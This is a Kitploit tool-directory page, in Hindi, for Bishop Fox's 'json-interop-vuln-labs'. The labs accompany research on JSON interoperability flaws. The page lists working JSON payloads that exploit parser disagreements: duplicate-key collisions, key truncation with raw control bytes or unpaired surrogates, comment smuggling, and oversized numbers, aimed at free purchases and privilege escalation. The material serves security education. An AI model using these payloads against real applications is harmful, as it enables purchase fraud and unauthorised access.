Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
json-interop-vuln-labs — "An Exploration of JSON Interoperability Vulnerabilities" के साथी लैब्स | Kitploit
उपकरण/GitHubGitHub/bishopfox/json-interop-vuln-labs
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubbishopfox/json-interop-vuln-labs

json-interop-vuln-labs

"An Exploration of JSON Interoperability Vulnerabilities" के साथी लैब्स

रिपॉजिटरी देखें
210193 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

JSON इंटरऑपरेबिलिटी भेद्यता प्रयोगशालाएँ

विवरण

ये मेरे शोध लेख "JSON इंटरऑपरेबिलिटी भेद्यताओं का अन्वेषण" की सहायक प्रयोगशालाएँ हैं।

लैब 1: ई-कॉमर्स एप्लिकेशन में मुफ़्त खरीदारी

  • कुंजी टकराव हमले: असंगत डुप्लिकेट कुंजी प्राथमिकता
  • असंगत बड़ी संख्या निरूपण

लैब 2: मल्टी-टेनेंट एप्लिकेशन में विशेषाधिकार वृद्धि

  • कुंजी टकराव हमले: वर्ण छंटन

ये प्रयोगशालाएँ डिफ़ॉल्ट रूप से होस्ट पोर्ट 5000-5004 से बंधती हैं।

हमले की तकनीकें

1. कुंजी टकराव

असंगत डुप्लिकेट कुंजी प्राथमिकता

root@kitploit:~
{"qty": 1, "qty": -1}

वर्ण छंटन

अंतिम-कुंजी प्राथमिकता पार्सरों में छंटन (पहली-कुंजी प्राथमिकता के लिए क्रम उलटें)

root@kitploit:~
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}

टिप्पणी छंटन

ये दस्तावेज़ टिप्पणियों और बिना-उद्धरण वाले स्ट्रिंग्स के असंगत समर्थन का लाभ उठाते हैं:

root@kitploit:~
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}

2. संख्या डिकोडिंग

असंगत बड़ी संख्या डिकोडिंग

ये बड़े संख्यात्मक मान स्ट्रिंग्स (जैसे, "+Infinity") में परिवर्तित हो सकते हैं, जिससे टाइप-जगलिंग भेद्यताएँ उत्पन्न हो सकती हैं। या, वे MAX_INT/MIN_INT, राउंड किए गए मान, या 0 में परिवर्तित हो सकते हैं, जो व्यावसायिक तर्क को बायपास करने की अनुमति दे सकते हैं।

root@kitploit:~
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}

लेखक

Twitter: @theBumbleSec

GitHub: the-bumble

टूल डाउनलोड करें